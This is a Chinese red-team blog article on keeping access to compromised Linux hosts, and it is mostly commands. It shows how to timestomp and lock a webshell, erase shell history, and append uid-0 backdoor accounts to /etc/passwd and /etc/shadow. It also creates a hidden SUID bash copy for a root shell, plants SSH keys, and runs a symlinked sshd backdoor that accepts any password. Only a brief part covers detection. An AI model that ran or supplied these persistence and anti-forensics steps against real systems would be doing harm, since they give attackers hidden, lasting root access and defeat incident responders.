原创 白安全组
今年的红队评分标准,红队维持权限时间越久,得分越高,所以权限维持迫在眉睫。
一、隐藏技巧
1.1 修改文件属性
蓝队如果根据时间来判断文件是否为后门,可以通过参考index.php的时间,来比对,来排出shell文件
我们可以使用touch命令,来修改文件或者目录的时间属性。包括存取和更改时间:
touch -r index.php shell.php
1.2 文件锁定(权限隐藏)
在Linux中,使用chattr命令来防止root或者其他用户误删,这个权限是ls -l查看不出来的,达到一个隐藏权限的目的。
chattr +i evil.php #锁定⽂件
rm -rf evil.php #提示禁⽌删除lsattr evil.php #属性查看
chattr -i evil.php #解除锁定
rm -rf evil.php #彻底删除⽂件
1.3 历史操作命令隐藏
方式一:针对我们的命令终端关闭历史聊天记录
[space]set +o history
[space] 表示空格。并且由于空格的缘故,该命令本身也不会被记录
从上面命令之后,我们在同一个终端中,之后的所有命令都不会被记录在历史中,这个命令之前的所有东西都会原样记录在历史中。
需要重新开启历史记录,执行:
[Space]set -o history #将环境恢复原状
方式二:从历史记录中删除指定命令
指定某个记录进行删除
history | grep "keyword"
输出历史记录中匹配的命令,每一条前面会有一个数字
history -d [num]
删除大规模的历史操作记录(不如方式一直接用),只保留前面150行
sed -i '150,$d' .bash_history
二、添加用户
2.1 passwd写入
我们可以直接通过写入passwd文件进行用户写入
/etc/passwd 各部分含义:
⽤户名:密码:⽤户ID:组ID:身份描述:⽤户的家⽬录:⽤户登录后所使⽤的SHELL
增加超级用户:
$echo "momaek:savbSWc4rx8NY:hacker:/root:/bin/bash" >> /etc/passwd
直接通过passwd写入不适用于所有系统,因为passwd对于所有用户可读,所以现在很多系统使用加密分装shadow技术,真正的密码存在/etc/shadow文件中
/etc/shadow 各部分含义:
⽤户名:密码的MD5加密值:⾃系统使⽤以来⼝令被修改的天数:⼝令的最⼩修改间隔:⼝令更改的周期:⼝令失效的天数:⼝令失效以后帐号会被锁定多少天:⽤户帐号到期时间:保留字段尚未使⽤
如果系统不允许uid=0的用户远程登录,
可以增加一个普通用户
echo "momaek:savbSWc4rx8NY:-1:-1:-1:-1:-1:-1:500" >> /etc/shadow
如果可以允许uid=0远程登录:
增加超级用户命令
echo "cshm:x:0:0::/:/bin/sh" >> /etc/passwd
#增加超级⽤户账号
passwd cshm
#修改cshm的密码
设置不允许root账户远程登录,参考链接:(https://www.cnblogs.com/binblogs/p/5201307.html)
第三种情况:不交互⽆回显添加Linux密码
第一种
useradd wxg -u 0 -o -g root -G root|| echo "123456" | passwd --stdin wxg
#创建账户wxg、密码123456且为root权限
useradd wxg -u 0 -o -g root -G root|| echo "123456" | passwd --stdin wxg
#创建账户wxg、密码123456且为root权限
需要执行两次
第二种:
useradd test echo "123456" | passwd --stdin test
权限非常小
第三种:
useradd -u 0 -o -g root -G root user |echo -e "1qazwsx2wsx\n1qazwsx2wsx"|passwd user
也是需要执行两次,而且对密码强度有需求
三、SUID
当一个文件所属主的x标注位s时(简称suid),且所属主为root组,执行该文件时,其实是以root身份执行的。
必要条件:
1、SUID权限仅对⼆进制程序有效。
2、执⾏者对于该程序需要具有x的可执⾏权限
3、本权限仅在执⾏该程序的过程中有效
4、在执⾏过程中执⾏者将具有该程序拥有者的权限
我们可以创建一个suid权限的文件
$cp /bin/bash /tmp/.woot
$chmod 4755 /tmp/.woot
$ls -al /.woot-rwsr-xr-x 1 root root 690668 Jul 24 17:14 .woot
我们可以使用一般的用户权限去运行
$/tmp/.woot
$/tmp/.woot -p
bash2 针对 suid 有⼀些护卫的措施,使⽤-p参数来获取⼀个root shell
检测方式:
查找具有suid权限的文件即可
find / -perm +4000 -ls
find / -perm -u=s -type f 2>/dev/null
四、SSH公私钥连接
公钥免密登录,也属于是一种常见的后门方式,在一些特殊情况下,还可以获取交互的shell,比如struts写入公钥,oracle写⼊公钥连接,Redis未授权访问等情景。
ssh-keygen -t rsa //⽣成公钥
echo id_rsa.pub >> .ssh/authorized_keys //将id_rsa.pub内容放到⽬标.ssh/authorized_keys⾥
五、软链接
通过软链接建立一个ssh后门
ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=12345
建立链接到/usr/local/su文件,也可以其他目录页,su文件名不变,否则无法登录。通过其他设置,更改su名字也可以。然后上面启动监听12345端口,登录时候密码随意。
登录如下:
ssh root@xxx.xxx.xxx.xxx -p 12345
这个目标进行软连接的时候,如果使用了其他账号创建,登录时需要使用对应的账号,而不是root
参考🔗
https://mp.weixin.qq.com/s?__biz=MzU4MjYxNTYwNA==&mid=2247487506&idx=1&sn=a958beca2ae5ea6b2e1932c7bcf194a3&chksm=fdb4c749cac34e5fbc88ebac43d7468eed2d47c50175d90199a4b8a9677f59bbe3b50de88981#rd
